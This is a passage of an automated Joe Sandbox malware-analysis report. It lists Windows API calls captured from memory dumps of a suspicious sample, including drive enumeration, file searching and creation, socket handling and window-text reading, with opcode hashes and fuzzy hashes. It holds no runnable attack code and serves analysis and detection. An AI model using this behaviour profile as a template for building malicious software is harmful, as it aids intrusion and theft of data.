                                                                                                                                                                                                              • free.MSVCRT(?,772D7310,00000000,0130A320), ref: 01314221
                                                                                                                                                                                                              • free.MSVCRT(?,772D7310,00000000,0130A320), ref: 0131422B
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: free
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1294909896-0
                                                                                                                                                                                                              • Opcode ID: 088f0bd6fada9f734e238dc11f470a7d1774c1ba94ab3c528181d15105e5bff0
                                                                                                                                                                                                              • Instruction ID: 67b0c632f788d4427d3a1091fe34f6eceed4bdfaaa1d40c2311de3c10a3bd286
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 088f0bd6fada9f734e238dc11f470a7d1774c1ba94ab3c528181d15105e5bff0
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E60192F2A017811BE734DFAD98D048BBED56D45308359883DD2DE83A08D331F8899711
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • malloc.MSVCRT(000000FF,?,?,?,?,00000000,?,?,?), ref: 013113F9
                                                                                                                                                                                                              • realloc.MSVCRT(?,000000FF,?,?,?,?,00000000,?,?,?), ref: 01311405
                                                                                                                                                                                                              • malloc.MSVCRT(00000000,?,?,?,?,00000000,?,?,?), ref: 013114AC
                                                                                                                                                                                                              • realloc.MSVCRT(?,00000000,?,?,?,?,00000000,?,?,?), ref: 013114B8
                                                                                                                                                                                                                • Part of subcall function 01310EA0: __WSAFDIsSet.WS2_32(?,?), ref: 01310F50
                                                                                                                                                                                                                • Part of subcall function 01310EA0: closesocket.WS2_32(?), ref: 01310F6D
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: mallocrealloc$closesocket
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 403730927-0
                                                                                                                                                                                                              • Opcode ID: 74ac0c5116f5d12fb541fe6d7c0f0721cb726456e15ceb2cb58e792190fa6e40
                                                                                                                                                                                                              • Instruction ID: c28ee1b665fb0ea2562c2c04dd1a2acab4e31839ac0fa223cc622d6159bb6c6b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 74ac0c5116f5d12fb541fe6d7c0f0721cb726456e15ceb2cb58e792190fa6e40
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 60B1C772A046068FCB18CF28D990AE57BB5FF94315F0881B9ED1D9F34AD775A901CBA0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000,?,00000004), ref: 0130E510
                                                                                                                                                                                                              • free.MSVCRT(00000000,?,00000004,?,00000000,00000000), ref: 0130E56F
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateFilefree
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1298414175-0
                                                                                                                                                                                                              • Opcode ID: 358001167fd3aa46de17ee4df3a07cd9a806fb200704d6ac4c9f0284f8dde3ea
                                                                                                                                                                                                              • Instruction ID: 28451abfc7503106d34035d5d5ccb7292f15065a7873464d11625685ea23f8ab
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 358001167fd3aa46de17ee4df3a07cd9a806fb200704d6ac4c9f0284f8dde3ea
                                                                                                                                                                                                              • Instruction Fuzzy Hash: CB419731B046094BEB32CF7CAC647EA7FE09B85318F1085BAEA5AD72C2DA355005C7A1
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetLogicalDriveStringsA.KERNEL32(00000104,?), ref: 0130E119
                                                                                                                                                                                                              • GetDriveTypeA.KERNEL32(?), ref: 0130E15E
                                                                                                                                                                                                              • SetErrorMode.KERNEL32(00000001), ref: 0130E1D2
                                                                                                                                                                                                              • free.MSVCRT(00000000), ref: 0130E1FF
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Drive$ErrorLogicalModeStringsTypefree
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2496910992-0
                                                                                                                                                                                                              • Opcode ID: b1cb2112fc231192ffb1cf01d989f63bf8d6939fda063d95eeaa8f6473cd588d
                                                                                                                                                                                                              • Instruction ID: 6cd0b1da5514dca4daba8acc65d7685ffc24bfb8e4e3a9f44dba282a121354a1
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b1cb2112fc231192ffb1cf01d989f63bf8d6939fda063d95eeaa8f6473cd588d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1E31497270024E8FDB11CEE8E8946FE7BE8EB45315F1409B6EA4587281E7318616C7E2
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • fseek.MSVCRT(?,00000000,00000000), ref: 012F82AB
                                                                                                                                                                                                              • fwrite.MSVCRT(00000003,00000020,00000001), ref: 012F82C2
                                                                                                                                                                                                              • fwrite.MSVCRT(00000003,00000020,?,00000000), ref: 012F82D1
                                                                                                                                                                                                              • fwrite.MSVCRT(?,00000001,00000001), ref: 012F82F1
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: fwrite$fseek
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3883414211-0
                                                                                                                                                                                                              • Opcode ID: 92208f68fdb5f2a85eb4d4b334cad2d81ed16a2daee7d8aaff8a7f9ec6193baf
                                                                                                                                                                                                              • Instruction ID: 54b22c8e983eaf3cbfe10567425d4e98e2bdbcce16bcd2448d4c2c9baf64f504
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 92208f68fdb5f2a85eb4d4b334cad2d81ed16a2daee7d8aaff8a7f9ec6193baf
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4221AC70A417469FD720CFA8C841BAAFBF5EF98700F04856DE585A7281E2B4BA408B90
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,?,?), ref: 012E7DAD
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,?), ref: 012E7DB4
                                                                                                                                                                                                              • memset.MSVCRT(00000000,00000000,?,?,?,?), ref: 012E7DC3
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 012E7DF3
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$AllocCloseProcessmemset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2501364573-0
                                                                                                                                                                                                              • Opcode ID: b2e143a4ae18f413964f60fc5e266314c4e7e4027802f9be1d5fdc46a8abed08
                                                                                                                                                                                                              • Instruction ID: 2e489d0b71fe78ad6acc173827472ed48ef2a37cdfecf450f4b472e4cd9db70e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b2e143a4ae18f413964f60fc5e266314c4e7e4027802f9be1d5fdc46a8abed08
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B3215E3392005A4FDB36AA78989CAFA7BD9EB59300F9406BCE785C7141D7718D4487D0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT(?,00000000,00000206), ref: 012F2392
                                                                                                                                                                                                              • GetParent.USER32(?), ref: 012F239E
                                                                                                                                                                                                              • GetWindowTextW.USER32(00000000,?,00000104), ref: 012F23B5
                                                                                                                                                                                                              • StrStrIW.SHLWAPI(?,00000000), ref: 012F23D6
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ParentTextWindowmemset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4175915554-0
                                                                                                                                                                                                              • Opcode ID: 534c375f3750ffef8f0cc4063dd1286661ef751d77fb023f60cec96bbfc4cced
                                                                                                                                                                                                              • Instruction ID: 5894c963116eea169ab2319fd9b3dac4546f7f2cc3c620d3ea2c1972f3a18f84
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 534c375f3750ffef8f0cc4063dd1286661ef751d77fb023f60cec96bbfc4cced
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3F012273B103246BE720AE6CAC88AA7F76CEB01610F00423EEF09E3101E970D95487A0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,00000104,00003000,00000004,00000000,61C5C0CB,?,012FC04F,00000000,00000000), ref: 01309B43
                                                                                                                                                                                                              • lstrcpynA.KERNEL32(00000000,00000000,00000104,?,012FC04F,00000000,00000000), ref: 01309B59
                                                                                                                                                                                                                • Part of subcall function 01309780: GetProcessHeap.KERNEL32(00000008,00004070,00000001,00000000,775B5CE0,?,012F3CE8,?), ref: 01309793
                                                                                                                                                                                                                • Part of subcall function 01309780: HeapAlloc.KERNEL32(00000000,?,012F3CE8,?), ref: 01309796
                                                                                                                                                                                                                • Part of subcall function 01309780: memset.MSVCRT(00000000,00000000,00004070,?,012F3CE8,?), ref: 013097AB
                                                                                                                                                                                                                • Part of subcall function 01309780: CreateFileA.KERNEL32(012F3CE8,40000000,00000003,00000000,00000002,00000080,00000000,?,012F3CE8,?), ref: 01309802
                                                                                                                                                                                                                • Part of subcall function 01309780: GetProcessHeap.KERNEL32(00000000,00000000,?,012F3CE8,?), ref: 01309825
                                                                                                                                                                                                                • Part of subcall function 01309780: HeapValidate.KERNEL32(00000000,?,012F3CE8,?), ref: 01309828
                                                                                                                                                                                                                • Part of subcall function 01309780: GetProcessHeap.KERNEL32(00000000,00000000,?,012F3CE8,?), ref: 01309834
                                                                                                                                                                                                                • Part of subcall function 01309780: HeapFree.KERNEL32(00000000,?,012F3CE8,?), ref: 01309837
                                                                                                                                                                                                              • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,012FC04F,00000000,00000000), ref: 01309B85
                                                                                                                                                                                                                • Part of subcall function 01309910: LocalAlloc.KERNEL32(00000040,-00000103,00000000,00000000,775B5CE0), ref: 01309991
                                                                                                                                                                                                                • Part of subcall function 01309910: _snprintf.MSVCRT(00000000,00000104,%s\*,00000000), ref: 013099AD
                                                                                                                                                                                                                • Part of subcall function 01309910: FindFirstFileA.KERNEL32(00000000,?), ref: 013099BC
                                                                                                                                                                                                                • Part of subcall function 01309910: LocalFree.KERNEL32(00000000), ref: 013099C9
                                                                                                                                                                                                                • Part of subcall function 01309910: wsprintfA.USER32(?,%s\%s,00000000,0000002E), ref: 01309A08
                                                                                                                                                                                                                • Part of subcall function 01309910: wsprintfA.USER32(00000000,%s\%s,00000000,?), ref: 01309A16
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$AllocFreeProcess$FileLocalVirtualwsprintf$CreateFindFirstValidate_snprintflstrcpynmemset
                                                                                                                                                                                                              • String ID: 61C5C0CB
                                                                                                                                                                                                              • API String ID: 4264910087-651512440
                                                                                                                                                                                                              • Opcode ID: e1257bb41462af8c08d56127a58340affd594f02a07ae4bc624f91c45dfbf575
                                                                                                                                                                                                              • Instruction ID: 5e65c6376137966db8fba935af310838144cc90ec2ac8350686b56cad6299cb8
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e1257bb41462af8c08d56127a58340affd594f02a07ae4bc624f91c45dfbf575
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 78F0E97638171537E2327A6D9C15FEB7B5CABC1F78F100025FB08AA2C1C9A1E54183B4
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000020,00000000,-00000010,?,012E432B,?), ref: 012E409C
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,012E432B,?), ref: 012E40A3
                                                                                                                                                                                                              • _snprintf.MSVCRT(00000000,00000014,%d.%d.%d.%d,?,?,?,?,?,012E432B,?), ref: 012E40E2
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$AllocProcess_snprintf
                                                                                                                                                                                                              • String ID: %d.%d.%d.%d
                                                                                                                                                                                                              • API String ID: 1060465051-3491811756
                                                                                                                                                                                                              • Opcode ID: 95dbf126cbaff49515262f516c9619c9b10cd05d1ca837147c94f9cad581c92c
                                                                                                                                                                                                              • Instruction ID: 9f79fd902a004f7b23f9bc8e0c2870208f4db5da87395201bae648245fa365fa
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 95dbf126cbaff49515262f516c9619c9b10cd05d1ca837147c94f9cad581c92c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 00F03CB1940724AFD370DF6A9845BA6BFF8EF0C711F00852EF699C6641E23596048BA4
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • TerminateThread.KERNEL32(00000000,00000000,?,?,012F8BDE,00000000,?,?,?,?,?,?), ref: 012FB8A0
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,012FB740,00000000,00000000,00000000,?,?,012F8BDE,00000000,?,?,?,?,?,?), ref: 012FB8B5
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?,00000000,?,?,012F8BDE,00000000), ref: 012FB8D3
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,012F8BDE,00000000), ref: 012FB8E4
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: HandleThread$CloseCreateInformationTerminate
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1825730051-0
                                                                                                                                                                                                              • Opcode ID: cfba48c11b300bc49d2f1ce182372fc9aecfad54336abe56e035b46ebb2360a5
                                                                                                                                                                                                              • Instruction ID: 9c58ae8a5e6c349f2dd8f07ef368eb0f1c237cebd942f41776d5f054b551e301
                                                                                                                                                                                                              • Opcode Fuzzy Hash: cfba48c11b300bc49d2f1ce182372fc9aecfad54336abe56e035b46ebb2360a5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 22F05475654305BBE7309FA9DC0AF9ABBACAB05B01F10006CFB05E61C5D7B0A6009764
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: private$public
                                                                                                                                                                                                              • API String ID: 0-4176808989
                                                                                                                                                                                                              • Opcode ID: 57f91a12d671a8df08cf14d6c3565ffc39f444ced2fc850d7fa84692e9aa09c6
                                                                                                                                                                                                              • Instruction ID: d567f44caf1d09adb6e8492851765afe636d9288cbb79375a99267fbabefbb16
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 57f91a12d671a8df08cf14d6c3565ffc39f444ced2fc850d7fa84692e9aa09c6
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 634189332242274BDB358E2C87552BAF366EB85214F4842BDDB86CB765F761A941C780
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetTickCount.KERNEL32(774D3550,00000000,012E5637), ref: 012E4102
                                                                                                                                                                                                              • _snprintf.MSVCRT(0133DAA0,00000104,%dd %dh %dm), ref: 012E4166
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CountTick_snprintf
                                                                                                                                                                                                              • String ID: %dd %dh %dm
                                                                                                                                                                                                              • API String ID: 3495410349-3074259717
                                                                                                                                                                                                              • Opcode ID: 8123a1c4e7ac6533fed5454f8ca8f108f43634f7ec07fefbe805f84b2b557155
                                                                                                                                                                                                              • Instruction ID: 8029d11946993bbe2e8702814cb4d0f0c2cf24e18ebc0c36ef642da937e4215d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8123a1c4e7ac6533fed5454f8ca8f108f43634f7ec07fefbe805f84b2b557155
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1BF0EC32B0111417E32CA81EAD0AABA998B87C832178CC23CFD0ACF3DCDCA49D1242C4
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 012FE6B0: memset.MSVCRT ref: 012FE6CF
                                                                                                                                                                                                                • Part of subcall function 012FE6B0: memset.MSVCRT ref: 012FE6F1
                                                                                                                                                                                                                • Part of subcall function 012FE6B0: GetLogicalDriveStringsA.KERNEL32(00000104,?,?,00000000,0000040C,00000103), ref: 012FE706
                                                                                                                                                                                                                • Part of subcall function 012FE6B0: SetErrorMode.KERNEL32(00000001), ref: 012FE71F
                                                                                                                                                                                                                • Part of subcall function 012FE6B0: GetDriveTypeA.KERNEL32(?), ref: 012FE768
                                                                                                                                                                                                                • Part of subcall function 012FE6B0: SetCurrentDirectoryA.KERNEL32(?), ref: 012FE77B
                                                                                                                                                                                                                • Part of subcall function 012FE6B0: FindFirstFileA.KERNEL32(?,?), ref: 012FE7DD
                                                                                                                                                                                                                • Part of subcall function 012FE6B0: SetErrorMode.KERNEL32(?), ref: 012FEAF3
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61C5C079), ref: 012FEB0B
                                                                                                                                                                                                                • Part of subcall function 012F39D0: EnterCriticalSection.KERNEL32(0132FB68,00000001,00000000,775B5CE0), ref: 012F39E9
                                                                                                                                                                                                                • Part of subcall function 012F39D0: GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 012F39FB
                                                                                                                                                                                                                • Part of subcall function 012F39D0: _snprintf.MSVCRT(?,00000104,%s%s,01339D68,0133D3A4), ref: 012F3A1B
                                                                                                                                                                                                                • Part of subcall function 012F39D0: SetCurrentDirectoryA.KERNEL32(?), ref: 012F3A2B
                                                                                                                                                                                                                • Part of subcall function 012F39D0: PathAddBackslashA.SHLWAPI(?), ref: 012F3B00
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CurrentDirectory$BackslashDriveErrorModePathmemset$CriticalEnterFileFindFirstLogicalSectionStringsType_snprintf
                                                                                                                                                                                                              • String ID: 61C5C079$COLV
                                                                                                                                                                                                              • API String ID: 2461973751-3533035949
                                                                                                                                                                                                              • Opcode ID: 5af2261b0e325a42618f22e6b8984e32e4bff5eb108956f3cf06c372e745f6d3
                                                                                                                                                                                                              • Instruction ID: c97b52eae001c42713fa5946c813334280bc225357e2e96370f1c0a1b74c223c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5af2261b0e325a42618f22e6b8984e32e4bff5eb108956f3cf06c372e745f6d3
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DEB092726A131266C0663BA62C06969AA242BE4D1AF11241EF20270A488D9150A0D77E
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103444629.0000000001280000.00000040.00000001.00020000.00000000.sdmp, Offset: 01280000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_1280000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: ,D0<$,D0<$D0<$D0<
                                                                                                                                                                                                              • API String ID: 0-1748840775
                                                                                                                                                                                                              • Opcode ID: 9c97c9d7d5ab04b2b8c5162830f736a79e74322f88f577f4ab0dfe4acc82c9df
                                                                                                                                                                                                              • Instruction ID: 447b562caa6e0e8c4e732344c552027760e8d997c974f44a808086c171043214
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9c97c9d7d5ab04b2b8c5162830f736a79e74322f88f577f4ab0dfe4acc82c9df
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 61519F71D10229ABEF14CFA9CD84BBEBBB8EB45705F50451AFB00EB191D7709980CB95
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memcpy.MSVCRT(?,?,00000000,?,?,00000008,00000000,?), ref: 01319468
                                                                                                                                                                                                              • memcpy.MSVCRT(?,?,?,?,?,?,00000008,00000000,?), ref: 0131950B
                                                                                                                                                                                                              • memset.MSVCRT(?,00000000,?,?,?,00000008,00000000,?), ref: 01319584
                                                                                                                                                                                                              • memset.MSVCRT(?,00000000,?,?,?,00000008,00000000,?), ref: 013195BD
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
• Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: memcpymemset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1297977491-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • malloc.MSVCRT(00000028,?,?,?,?,01314DFF,?,?,?,?,?,?,00000005,?), ref: 0130B0AE
                                                                                                                                                                                                              • malloc.MSVCRT(00000014,?,01314DFF,?,?,?,?,?,?,00000005,?,?,?,?,774D3080), ref: 0130B0C3
                                                                                                                                                                                                              • malloc.MSVCRT(00000028,?,01314DFF,?,?,?,?,?,?,00000005,?,?,?,?,774D3080), ref: 0130B0E9
                                                                                                                                                                                                              • malloc.MSVCRT(00000014,?,01314DFF,?,?,?,?,?,?,00000005,?,?,?,?,774D3080), ref: 0130B104
